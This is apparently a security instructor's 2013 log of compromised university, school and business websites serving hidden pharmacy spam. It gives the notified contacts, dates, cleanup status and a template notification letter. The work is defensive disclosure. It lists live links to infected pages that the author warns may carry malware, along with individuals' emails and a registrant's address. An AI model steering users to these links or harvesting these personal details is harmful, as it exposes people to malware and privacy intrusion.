https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CE4QFjAE&url=http%3A%2F%2Fwww.targettravel.co.uk%2Fviagra-uk-supplier.html&ei=O2iTUv2wEtTjoATEpoGwBQ&usg=AFQjCNEPEC4Xk4UkVMHCGjYWnwDQsxRdSw&sig2=JV3uN_kNSrCny56V5LlpSw&bvm=bv.56988011,d.cGU |
2. wccsj.ac.uk Welsh Centre for Crime and Social Justice |
admin@wccsj.ac.uk abuse@wccsj.ac.uk security@wccsj.ac.uk Notified directly 11-26-13 Still infected 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0CGEQFjAG&url=http%3A%2F%2Fwccsj.ac.uk%2Findex.php%3Fid%3D123137&ei=O2iTUv2wEtTjoATEpoGwBQ&usg=AFQjCNFAk_vZczVyKhEWuX69y3X5aKtQbw&sig2=xT3Da_5LAGABDsC5kMs5sA&bvm=bv.56988011,d.cGU
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0CGkQFjAH&url=http%3A%2F%2Fwccsj.ac.uk%2Findex.php%3Fid%3D123287&ei=O2iTUv2wEtTjoATEpoGwBQ&usg=AFQjCNFlM1bFAF_s1Q-cLWj_NJwbmgOVqg&sig2=2T_MpWV716UYjLoat5gbHw&bvm=bv.56988011,d.cGU |
3. hip.hertford.ox.ac.uk Oxford University |
louise.turner@hertford.ox.ac.uk security@hertford.ox.ac.uk abuse@hertford.ox.ac.uk andrew.hemingway@hertford.ox.ac.uk Notified directly 11-26-13 Still infected 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0CHgQFjAJ&url=http%3A%2F%2Fhip.hertford.ox.ac.uk%2Fviagra%2F&ei=O2iTUv2wEtTjoATEpoGwBQ&usg=AFQjCNHdQLUhdt1SJ22JS-R6jbzevjmeuQ&sig2=7Jhk36XEqaTnIeTHIHc31Q&bvm=bv.56988011,d.cGU |
4. studyingeconomics.ac.uk U. of Bristol |
econ-network@bristol.ac.uk webmaster@bristol.ac.uk abuse@bristol.ac.uk security@bristol.ac.uk A.Bernays@bristol.ac.uk Notified directly 11-26-13 Cleaned 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=16&ved=0CFYQFjAFOAo&url=http%3A%2F%2Fstudyingeconomics.ac.uk%2Fgames-and-books%2F%3Fc3r1z%3D681291&ei=BnSTUs-XC4_YoASdwYKIAg&usg=AFQjCNGkH30VSsigQhRR7A2BnvqRE9pQUA&sig2=afk7SdZWe6Oo1gyTlfYNMA&bvm=bv.57127890,bs.1,d.cGE&cad=rja |
5. www.met.reading.ac.uk U. of Reading |
infosec@met.reading.ac.uk webmaster@reading.ac.uk secuity@reading.ac.uk abuse@reading.ac.uk vc@reading.ac.uk Notified directly 11-26-13 Cleaned 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=27&ved=0CFoQFjAGOBQ&url=http%3A%2F%2Fwww.met.reading.ac.uk%2F~sws96srb%2Fuploads%2Fupload%2Flunchsem.php%3Fdc%3D1682&ei=y3aTUpmaNsXsoATPrIDYBg&usg=AFQjCNGR2z9NsMiI0DqinKezG5VkHx5cQg&sig2=kYUGqOD11Isu5_V9DQ5wJA&bvm=bv.56988011,d.cGU |
6. www.cemmap.ac.uk Economic and Social Research Council |
emma_h@ifs.org.uk abuse@ifs.org.uk security@ifs.org.uk websupport@esrc.ac.uk angela.newton@esrc.ac.uk Notified directly 11-26-13 Cleaned 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=28&ved=0CGMQFjAHOBQ&url=http%3A%2F%2Fwww.cemmap.ac.uk%2Fwps%2Fonline%2F%3Fmedic%3D42386-ViagRX-viagra-tablets-sale&ei=y3aTUpmaNsXsoATPrIDYBg&usg=AFQjCNForrP6m0Vu_-OeKWn3av0MyotYFA&sig2=BGHWJ1vpPF_iPq2pVnnQUA&bvm=bv.56988011,d.cGU |
7. cardiffmet.ac.uk Cardiff Metropolitan U. |
izone@cardiffmet.ac.uk abuse@cardiffmet.ac.uk security@cardiffmet.ac.uk izone@cardiffmet.ac.uk hward@effcom.co.uk Notified directly 11-26-13 Cleaned 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=30&ved=0CHEQFjAJOBQ&url=http%3A%2F%2Fceramics.cardiffmet.ac.uk%2Fresources%2Fsuperdrug-uk-viagra&ei=y3aTUpmaNsXsoATPrIDYBg&usg=AFQjCNHh4kbCHDBqSMahWEyO_aYrpAGO4w&sig2=MZGm_bGd-yJpNKUKIeSoDw&bvm=bv.56988011,d.cGU
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=29&ved=0CGoQFjAIOBQ&url=http%3A%2F%2Fceramics.cardiffmet.ac.uk%2Fresources%2Fviagra-through-customs-uk&ei=y3aTUpmaNsXsoATPrIDYBg&usg=AFQjCNG-4yyKatNp9Oqt4lPHz3LXL_RWpw&sig2=JEeU5jVHROMeQx1-gtZAkw&bvm=bv.56988011,d.cGU |
8. www.cranfield.ac.uk Cranfield U. |
mediarelations@cranfield.ac.uk security@cranfield.ac.uk abuse@cranfield.ac.uk info@cranfield.ac.uk Notified directly 11-26-13 Cleaned 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&ved=0CEsQFjAEOAo&url=http%3A%2F%2Faerade.cranfield.ac.uk%2Fimages%2Frgam%2F%3Fapiqyf%3D196%26bibywuqy%3Dviagra&ei=tHuTUpCEDczmoATn04LoAQ&usg=AFQjCNEnErjuCDaR2QXx972TvBBa4aq87g&sig2=WRD5YXEKow1RhAOvptB36A&bvm=bv.56988011,d.cGU
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=16&ved=0CFQQFjAFOAo&url=http%3A%2F%2Faerade.cranfield.ac.uk%2Fimages%2Frgam%2F%3Fapiqyf%3D4%26bibywuqy%3Dviagra&ei=tHuTUpCEDczmoATn04LoAQ&usg=AFQjCNG5NMyVIYo2gzS4-PGxDUAK9b_Usw&sig2=Q_oSBJUiPpKfZM8a2OpKsw&bvm=bv.56988011,d.cGU https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=17&ved=0CFwQFjAGOAo&url=http%3A%2F%2Faerade.cranfield.ac.uk%2Fimages%2Frgam%2F%3Fapiqyf%3D225%26bibywuqy%3Dviagra&ei=tHuTUpCEDczmoATn04LoAQ&usg=AFQjCNG5C5lSb1AQBQKOmHz7gauH5UZ6gA&sig2=b4RUGCAQ_tEsEvfa7olAcw&bvm=bv.56988011,d.cGU |
9. rca.ac.uk Royal College of Art |
info@rca.ac.uk abuse@rca.ac.uk security@rca.ac.uk ied@rca.ac.uk media@rca.ac.uk publications@rca.ac.uk Notified directly 11-26-13 Cleaned 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=18&ved=0CGUQFjAHOAo&url=http%3A%2F%2Fwww.di09.rca.ac.uk%2Fwp-content%2Fuploads%2Floenga%2F103-viagra.html&ei=tHuTUpCEDczmoATn04LoAQ&usg=AFQjCNFlcmx5STMygRXNA2Rznz_h5sCm-w&sig2=4mlkERaImer88RDtorgRzw&bvm=bv.56988011,d.cGU
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=19&ved=0CG0QFjAIOAo&url=http%3A%2F%2Fwww.di09.rca.ac.uk%2Fwp-content%2Fuploads%2Floenga%2F157-viagrx.html&ei=tHuTUpCEDczmoATn04LoAQ&usg=AFQjCNGWqUf_qQTZUJ2_ZrzHCXI4LyLeLw&sig2=-3aV-L0oSJ0ProTmKJx7Ig&bvm=bv.56988011,d.cGU |
10. wlecentre.ac.uk Institute of Education, London |
info@ioe.ac.uk security@ioe.ac.uk abuse@ioe.ac.uk security@wlecentre.ac.uk abuse@wlecentre.ac.uk web.editor@ioe.ac.uk Notified directly 11-26-13 Cleaned 11-27-13 |
http://www.wlecentre.ac.uk/index.php/viagra-sales |
11. rhul.ac.uk Royal Holloway U. of London |
iQuad@rhul.ac.uk security@rhul.ac.uk Notified directly 11-26-13 Cleaned 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=39&ved=0CGcQFjAIOB4&url=http%3A%2F%2Fwww.scc.rhul.ac.uk%2Fmwidmer%2FPublications%2F%3Fwhere%3D2924%26what%3Dviagra%2Bsubstitute%2Buk&ei=nY6TUuvcBcztoATV14CwBQ&usg=AFQjCNG2xt-lmlojaxdN61fFxQisWED-WA&sig2=eSsb3pwcgDh7wmgiEe2tIQ&bvm=bv.56988011,d.cGU
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=40&ved=0CHAQFjAJOB4&url=http%3A%2F%2Fwww.scc.rhul.ac.uk%2Fmwidmer%2FPublications%2F%3Fwhere%3D4387%26what%3Dviagra%2Brezeptfrei%2Bschweiz&ei=nY6TUuvcBcztoATV14CwBQ&usg=AFQjCNHXYX9HkUK2ulD5bovGZpJWfzqVdg&sig2=8OWwTRVFtQhpRyFZCIX2VA&bvm=bv.56988011,d.cGU |
12. strethamschool.co.uk Stretham Primary School |
office@stretham.cambs.sch.uk security@stretham.cambs.sch.uk abuse@stretham.cambs.sch.uk Notified directly 11-26-13 Still infected 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=40&ved=0CHIQFjAJOB4&url=http%3A%2F%2Fwww.strethamschool.co.uk%2Fwp-content%2Fthemes%2Fgracio%2Fview-generic_viagra_cheap_prices.NzM1.html&ei=Z6aTUuz_DsreoATXwYGoBA&usg=AFQjCNEYT325h1PVm_kWNNp6LYvXKKihJA&sig2=qRLTPj_bkD3Wywafx2HBBA&bvm=bv.56988011,d.cGU |
I'll rearrange these as I proceed to other countries.
Organization | Emails | Malicious URL |
---|---|---|
1. www.iospress.nl Science book publisher |
iospress@accucoms.com abuse@accucoms.com security@accucoms.com abuse@accucoms.com editorial@iospress.nl security@iospress.nl abuse@iospress.nl http://twitter.com/IOSPress_STM Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CD8QFjAC&url=http%3A%2F%2Fwww.iospress.nl%2Forder-viagra-uk%2F&ei=O2iTUv2wEtTjoATEpoGwBQ&usg=AFQjCNFkDnoND5tbHHzyPLXM_FYuz_oCFQ&sig2=VLGnW8AXLxJqak4N0vyIDg&bvm=bv.56988011,d.cGU |
4. www.gaylea.com Many locations, but neither US nor UK |
questions@gayleafoods.com security@gayleafoods.com abuse@gayleafoods.com Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0CHEQFjAI&url=http%3A%2F%2Fwww.gaylea.com%2Fviagra-alternative-uk%2F&ei=O2iTUv2wEtTjoATEpoGwBQ&usg=AFQjCNGgwljON9etvbIadjxu1gDc7Yj_4A&sig2=6TCNwDzhv7smHlca1m95jA&bvm=bv.56988011,d.cGU
Not a redirection, hosted on their server, but only visible from Google
http://www.gaylea.com/dr-buying-viagra-online/
|
5. www.redleafresort.com.au |
reservations@redleafresort.com.au security@redleafresort.com.au abuse@redleafresort.com.au Notified 11-25-13 |
http://www.redleafresort.com.au/fast-mail-order-viagra/
http://www.redleafresort.com.au/tag-viagra-without-prescription/ http://www.redleafresort.com.au/ed-order-viagra/ http://www.redleafresort.com.au/a-erectile-dysfunction-viagra/ http://www.redleafresort.com.au/ed-cheap-viagra-from-canada/ Visible directly, not just from Google |
6. thiefandbandit.com |
thiefandbandit@gmail.com
Notified 11-25-13 |
http://thiefandbandit.com/a-buy-viagra-in-great-britain/
Visible directly, not just from Google |
7. www.petetribal.org |
klaflin@maine.rr.com sgrosse@maine.rr.com Notified 11-25-13 |
http://www.petetribal.org/in-cialis-commercial/
Visible directly |
8. www.cmmsmadeeasy.com Software company in WI, Site is incomplete |
abuse@cmmsmadeeasy.com security@cmmsmadeeasy.com Notified 11-25-13 |
http://www.cmmsmadeeasy.com/med-cialis-super-active/
Directly visible |
9. www.gaywellington.org |
helpline@gaywellington.org abuse@gaywellington.org security@gaywellington.org Notified 11-25-13 |
http://www.gaywellington.org/page-genaric-cialis/
Directly visible |
11. solidifi.com Appraisers in NY |
clientsupport@solidifi.com contactus@solidifi.com ABUSE@solidifi.com security@solidifi.com Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=11&ved=0CCsQFjAAOAo&url=http%3A%2F%2Fsolidifi.com%2Fbuy-uk-viagra%2F&ei=3G-TUti_KsHcoASDt4DYDw&usg=AFQjCNGmWN0VgD2blzs5ueLe2TsgaEcjpA&sig2=aayhKBmmXZ2YWipfGuL2jQ&bvm=bv.56988011,d.cGU |
12. www.jessicashops.com |
http://twitter.com/jessicashops security@jessicashops.com abuse@jessicashops.com Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=14&ved=0CEIQFjADOAo&url=http%3A%2F%2Fwww.jessicashops.com%2Fviagra-sale-uk%2F&ei=3G-TUti_KsHcoASDt4DYDw&usg=AFQjCNFRXa-_bfpIktfY5VO0fW_RHQvFiA&sig2=CHi2mViORBMw2DcsWP9PTg&bvm=bv.56988011,d.cGU |
13. www.blonk.it Italian book publisher |
info@blonk.it security@blonk.it abuse@blonk.it Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=18&ved=0CGgQFjAHOAo&url=http%3A%2F%2Fwww.blonk.it%2Fuk-viagra-cheap%2F&ei=3G-TUti_KsHcoASDt4DYDw&usg=AFQjCNEUwlKnBC2wn75lPhMN0MJEpIDMJA&sig2=bHI0GP1cAfS17jKGznK8-Q&bvm=bv.56988011,d.cGU |
18. uns.ac.id Indonesia |
security@uns.ac.id abuse@uns.ac.id Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=39&ved=0CGgQFjAIOB4&url=http%3A%2F%2Fekonomi.fkip.uns.ac.id%2F%3Fac-uk-buy-viagra&ei=SHqTUo24EczXoAT-64CwDQ&usg=AFQjCNEIGSsisNa_0zQsVkeI4yXh_SAb5w&sig2=EQUNyTPc4QvhNXFWT1r58w&bvm=bv.56988011,d.cGU |
19. uga.edu U of Georgia |
security@uga.edu abuse@uga.edu sebailey@uga.edu uc@uga.edu Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=16&ved=0CFYQFjAFOAo&url=http%3A%2F%2Fwww.forestry.uga.edu%2Fnews%2Fwp-content%2Fuploads%2F2013%2F02%2Fsql.php%3Fp%3Dbuy-viagra-in-vancouver&ei=g5iTUp-zL9jtoATGhILQCA&usg=AFQjCNErXq9q7nSvgwyUUmGNQdrm2otteg&sig2=3_amtwGrf8bpB8mMMcBQpg&bvm=bv.56988011,d.cGU |
20. ambassador.edu California |
Registrar@ambassador.edu security@ambassador.edu abuse@ambassador.edu Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=31&ved=0CCsQFjAAOB4&url=http%3A%2F%2Fwww.ambassador.edu%2Fphp.php%3Fnunun%3Dvic.edu.au-buy-viagra%26nun%3D3&ei=eqKTUvfNIsHmoATotoH4Dg&usg=AFQjCNHy2RuGD_FjvXAiZQjrtzqvIh3GeQ&sig2=Sb7gSjtNQI6gneeFGC9nAA&bvm=bv.56988011,d.cGU |
21. wku.edu Western Kentucky University |
wku@wku.edu abuse@wku.edu security@wku.edu torie.cockriel@wku.edu Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=35&ved=0CEgQFjAEOB4&url=http%3A%2F%2Fip205-109.ieb.wku.edu%2Fsuccess.php%3Fkokok%3Dvic.edu.au-buy-viagra%26hoh%3D3&ei=eqKTUvfNIsHmoATotoH4Dg&usg=AFQjCNGBT3C5l-f7lrwVva6_KK3MZ0mUVw&sig2=VfP-2tQYGnlnRgXDSMkmiw&bvm=bv.56988011,d.cGU |
22. harvard.edu |
@harvard president@harvard.edu abuse@harvard.edu security@harvard.edu ranna_farzan@harvard.edu, scott_fields@harvard.edu Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&ved=0CEgQFjAEOAo&url=http%3A%2F%2Fwww.hcs.harvard.edu%2Fiop%2Fwp-content%2Fuploads%2F2011%2F07%2F%3Fvn%3Dviagra-au%26f%3D2&ei=pKSTUpGINYP3oAT484KYCQ&usg=AFQjCNHqoyAj1Q5zxY9rDNxlBUwizH5bRw&sig2=727rDcHGz7vJExtz9b4Pig&bvm=bv.56988011,d.cGU |
23. www.sutherlandclinic.com Tennessee |
Cbmaccallum@sutherlandclinic.com abuse@sutherlandclinic.com security@sutherlandclinic.com Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CDQQFjAB&url=http%3A%2F%2Fwww.sutherlandclinic.com%2Fcardiologyexperts.html&ei=hqeTUrvqNcH6oASUzYDwBg&usg=AFQjCNHnHdwsOKlVdDzVeuPtxTm75BqQmQ&sig2=wLSIsaLDlFSfRFBtLmybTQ&bvm=bv.56988011,d.cGU |
inurl:ac.nz intitle:viagra
Organization | Emails | Malicious URL |
---|---|---|
1. apsa.ac.nz U. of Auckland |
admin@auckland.ac.nz abuse@auckland.ac.nz studentinfo@auckland.ac.nz t.greene@auckland.ac.nz fmhsweb@auckland.ac.nz Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0CG8QFjAI&url=http%3A%2F%2Fapsa.ac.nz%2F%3Fp%3Dhow-to-buy-viagra-30-pills-in-uk%26eq%3Dviagra&ei=2ZmTUpb8CYbxoATb54LwDg&usg=AFQjCNG88Lge4bgaz-zAsO1gUTlvPOfA8Q&sig2=HT-n7MYj7ByYEaS89bDanQ&bvm=bv.56988011,d.cGU
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0CHYQFjAJ&url=http%3A%2F%2Fapsa.ac.nz%2F%3Fp%3Dbuy-female-viagra-30-pills-100-mg-76-06usd-overnight-shipping%26iq%3Dfemale-viagra&ei=2ZmTUpb8CYbxoATb54LwDg&usg=AFQjCNHRijndrYs1Iz-f0uQfrlgnjG_3ig&sig2=PHmj6FeWBjenUqBAAtqnqQ&bvm=bv.56988011,d.cGU https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=11&ved=0CCsQFjAAOAo&url=http%3A%2F%2Fapsa.ac.nz%2F%3Fp%3Dfemale-viagra-without-prescriptione%26dv%3Dfemale-viagra&ei=GpuTUqbOMtTToASg2YCoAQ&usg=AFQjCNGu4F9IhryCu7I9tnANUFUzxZ4wNA&sig2=cYkn6lHL-iw1lihdzTr_Ig&bvm=bv.56988011,d.cGU |
inurl:.edu.au intitle:viagra
inurl:.au intitle:viagra school
Organization | Emails | Malicious URL |
---|---|---|
1. usyd.edu.au U. of Sydney |
admin@sydney.edu.au abuse@sydney.edu.au vice.chancellor@sydney.edu.au Notified 11-25-13 |
http://acl.arts.usyd.edu.au/threecities/index.php?option=com_content&task=view&itemes=viagra |
2. icms.edu.au International College of Management, Sydney |
admin@icms.edu.au abuse@icms.edu.au info@icms.edu.au tmaillet@icms.edu.au dshiell@icms.edu.au Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CD0QFjAC&url=http%3A%2F%2Fwww.icms.edu.au%2Fed%2Fviagra-online&ei=fZuTUqayKoXwoASOgILYDw&usg=AFQjCNEc1_-QU8CNZup221vUc_Y5kP6G0g&sig2=-Rug8h2yFcngyr_MdtJ96A&bvm=bv.56988011,d.cGU |
3. www.bethany.sa.edu.au Bethany Christian School |
karen.julius@bethany.sa.edu.au admin@is.sa.edu.au abuse@is.sa.edu.au office@ais.sa.edu.au Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CEYQFjAD&url=http%3A%2F%2Fwww.bethany.sa.edu.au%2Findex.php%3Fid%3D217572&ei=fZuTUqayKoXwoASOgILYDw&usg=AFQjCNF8hKuGYFfGffkKzmwv1NzJbsYdrw&sig2=rMyltfzj63ZTHPCvxj_qLA&bvm=bv.56988011,d.cGU |
4. www.unsw.edu.au U. of New South Wales |
https://twitter.com/unsw admin@unsw.edu.au abuse@unsw.edu.au vice-chancellor@unsw.edu.au shane.coxATunsw.edu.au Notified 11-25-13 |
https://collab.phys.unsw.edu.au/gens4015/index.php/Viagra
https://collab.phys.unsw.edu.au/gens4015/index.php/Generic_viagra https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=14&ved=0CEAQFjADOAo&url=http%3A%2F%2Fmembranes.edu.au%2Fblog%2Fhkiu%2Flopybis-buying-using-paypal%2F&ei=X6GTUtuYFcLroAT8mYLACA&usg=AFQjCNHY_lt3svo4go_y6u6n5WF1wWYqJw&sig2=fQ7LGGhrwWBMoN2vVEkJ7g&bvm=bv.56988011,d.cGU That one redirects to a viagra site that is down now, but the infection is still present on your server |
5. qsma.org.au Queensland Self-Management Alliance |
admin@arthritis.org.au abuse@arthritis.org.au helene@arthritis.org.au Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=24&ved=0CEIQFjADOBQ&url=http%3A%2F%2Fqsma.org.au%2Fdmdocuments%2FMzA4.html&ei=oqWTUuWxJc_zoAS-4YCgBg&usg=AFQjCNHH4JAOU2OLcZrb6Qgjk1WSSN87gA&sig2=PWR2uVU7Ovf09PY8IltR-g&bvm=bv.56988011,d.cGU&cad=rja |
Here's the letter I used:
Subject: Infection on Your ServerHello:
I am Sam Bowne, an Instructor in Computer Networking and Information Technology at City College San Francisco.
Your web server has been hacked, and is being used to drive traffic to a site selling Viagra. This is a form of identity theft, stealing your good reputation.
To see the infection, visit the URL below. I recommend using a Mac or Linux machine to perform this test because the pages that open may contain malware.
Please alert your webmaster.
Many companies I have warned simply deleted the infected files, but they often restore themselves. I would like to do a more thorough analysis of this malware to guide people in cleaning it.
If you are interested in joining a working group to analyze this infection, please email me.
Details are here: http://samsclass.info/125/proj11/subtle-infect.htm
So the colleges I have been notifying are really secondary to the monetization of the scheme.
To hit this thing at its root, it seems valuable to get the sites that directly make money for them: online viagra sales.
I used these Google searches:
buy viagra
buy viagra online
Organization | Emails | Malicious URL |
---|---|---|
Hit 1. tobuyviagra.com |
Whois leads to: http://privacyprotect.org/contact/ Reported on 11-27-13 |
http://tobuyviagra.com/
Directly hosted page |
Hit 2. prototypeplayground.net Incomplete site, looks abandoned |
Whois leads to: IBRENNAN@B-ARCH.COM abuse@a2hosting.com Notified 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CEUQFjAB&url=http%3A%2F%2Fprototypeplayground.net%2F%3Frvt%3D43&ei=tkGWUoaYJJLioAT924KABg&usg=AFQjCNFd1i9_uAuE_m05o9sx43tdH0i5EA&sig2=6U3EGHKf7rTHEy79iMzohg&bvm=bv.57155469,d.cGU
|
Hits 3 and 4. thiefandbandit.com |
Previously contacted |
|
Hit 5. columbiagreenhouse.com Nursery School in New York |
info@columbiagreenhouse.com info@sunraycomputer.com Notified 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CFoQFjAE&url=http%3A%2F%2Fcolumbiagreenhouse.com%2Foldsite%2Fphotos%2F1%2F%3Ft%3D493&ei=tkGWUoaYJJLioAT924KABg&usg=AFQjCNHkz0Bfywio3VD3-Ynd3KpcDgOjEg&sig2=AY1lTmrGq1xvVjlW9shq6A&bvm=bv.57155469,d.cGU&cad=rja
|
Hit 6. viagra.com Looks like a legitimate pharmacy site! |
http://www.viagra.com/buy-real-viagra.aspx
| |
Hit 7. yelp.com Legitimate site |
http://www.yelp.com/search?find_desc=viagra&find_loc=San+Francisco%2C+CA
| |
Hit 8. canadadrugs.com Looks legitimate |
https://www.canadadrugs.com/products/viagra
| |
Hit 9. coreynahman.com Looks legitimate |
http://www.coreynahman.com/viagra.html
| |
Hits 10-11. anewwayoflife.org Site was down, but came back up on 11-30-13 |
Twitter: @SusanBurtonLA Informed 11-30-13 |
http://anewwayoflife.org/buy-viagra-perth/
http://anewwayoflife.org/buy-viagra-store/
|
Hit 12. vosh.org VOLUNTEER OPTOMETRIC SERVICES TO HUMANITY |
http://vosh.org/contact
Notified 11-27-13 |
http://www.vosh.org/viagraonline/
Directly hosted |
Hit 13. buyviagraonlineman.com |
Whois shows:
Owner Name: Whois Protection Owner Street: Fablovka 404 (All postal mail rejected) Owner City: Pardubice Owner ZIP: 53352 Owner Country: CZ Owner E-Mail: buyviagraonlineman.comA Czech anonymizer with a Russian DNS server; looks like the center of the operation. I doubt anyone there cares about them hacking colleges outside Russia, anyway. |
http://buyviagraonlineman.com/
|
Hit 14-15. www.iospress.nl |
Previously notified |
|
Hit 16. sedl.org |
Already cleaned! |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=16&ved=0CG8QFjAFOAo&url=http%3A%2F%2Fautism.sedl.org%2Findex.php%2Fabout-us&ei=mkmWUtWsBdXroATGg4HABg&usg=AFQjCNF04D1usOzrM_WTi9iKqfW1yDYwRQ&sig2=0DyJZ2LRBatr0LwV4SVG3A&bvm=bv.57155469,d.cGU
|
Hit 17. kotous.com |
Already cleaned! |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=17&ved=0CHgQFjAGOAo&url=http%3A%2F%2Fkotous.com%2Fcontact-us%2F&ei=mkmWUtWsBdXroATGg4HABg&usg=AFQjCNFbXdGZWiGuIcZfSltwPJwdufInug&sig2=puKYoDZg2lep7EkTKaTWMA&bvm=bv.57155469,d.cGU
|
Hit 18. larkenrose.com |
Already cleaned! |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=18&ved=0CIABEBYwBzgK&url=http%3A%2F%2Fwww.larkenrose.com%2Fstore.html&ei=mkmWUtWsBdXroATGg4HABg&usg=AFQjCNEeIKGkJg-2YhCc2AFkz142pFuAZw&sig2=ysxTuu4bJ_nGztS7-RIHaw&bvm=bv.57155469,d.cGU
|
Hit 19. becomehealthyandrich.com A front for the same scammers, most links are broken, the one that works goes to one of the same pages |
Whois:
Registrar WHOIS Server: whois.dynadot.com Registrar: DYNADOT LLC Registrar IANA ID: 472 Registrar Abuse Contact Email: Email Masking Image@dynadot.com Registrant Name: Gareev Anatoliy Registrant Street: Khokhryakova, 2, 15 Registrant City: Perm Registrant State/Province: Perm Registrant Postal Code: 614000 Registrant Country: RU Registrant Email: Email Masking Image@gmail.com Name Server: ns1.dietrichnames.com Name Server: ns2.dietrichnames.comOnce again, that looks like people who probably don't care about the hacking these guys are doing. |
http://becomehealthyandrich.com/
|
Hit 20. neara.org NEW ENGLAND ANTIQUITIES RESEARCH ASSOCIATION |
deveau@chebucto.ns.ca danleary@mrf-furnaces.com krosspt@lincoln.midcoast.com Notified 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=20&ved=0CJABEBYwCTgK&url=http%3A%2F%2Fneara.org%2F%3Fcbe%3D819&ei=mkmWUtWsBdXroATGg4HABg&usg=AFQjCNFO3d8aBdbePz5xvmesAPwfKG3iVg&sig2=mxfQ9TOraOaroILDR8Gg2A&bvm=bv.57155469,d.cGU
|
Hit 30. pharmacyathome.com |
A scam site according to
http://www.scamadviser.com/
|
http://www.pharmacyathome.com/
|
Hit 31. absecon.com Site unfinished, but links to http://abseconfrp.com/Home_Page.php , a mill in NJ |
composites@absecon.com abuse@absecon.com security@absecon.com Notified 11-27-13 |
http://www.absecon.com/buy-cheap-viagra/
Many more linked from that page
|
Hits for "buy viagra online" | ||
Hit 4 icheapviagraonline.com Hosting one of the known scam pages |
Whois shows a site registered privately in China.
But they use CoudDNS servers, and they have an abuse form here:
Reported 11-27-13 |
|
Hit 7. longislandassociation.org |
KLaw@longislandassociation.org mcohen@longislandassociation.org Notified 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0CHEQFjAG&url=http%3A%2F%2Fwww.longislandassociation.org%2Fprinters%2F&ei=eFaWUr2WAYjooASo-YCwCg&usg=AFQjCNGmFrSsYf0tyBbsa88MsNOQh3kTkA&sig2=ZEqZcFYj3mrYSLBGkXbn0A&bvm=bv.57155469,d.cGU
|
Hit 9. harvestworks.or |
Already cleaned! |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0CIEBEBYwCA&url=http%3A%2F%2Fwww.harvestworks.org%2F&ei=eFaWUr2WAYjooASo-YCwCg&usg=AFQjCNEoRhXS212-VVkrLPF6xdvKaYERnw&sig2=2AJG85ij6TUvMXzt1Dccxg&bvm=bv.57155469,d.cGU
|
Hit 10. accessrx.com Seems legitimate |
| |
Hit 11. stbf.org Strengthening The Black Family, Incorporated, NC |
nikki.smith@co.wake.nc.us torraine@torraine.com Notified 11-27-13 |
http://www.stbf.org/viagra/
And many other pages linked to from that page
|
Linked from stbf.org: calsport.org |
bjennings@calsport.org webmaster@calsport.org
|
http://calsport.org/cialis-cost/
And many other pages linked to from that page
|
Linked from stbf.org: growandknow.org NYC |
marni@growandknow.org marni.summer@gmail.com |
http://growandknow.org/order-viagra/
And many other pages linked to from that page
|
Hit 14. nfayearbooks.com Newburgh Free Academy |
Alerted by contact form 11-27-13 |
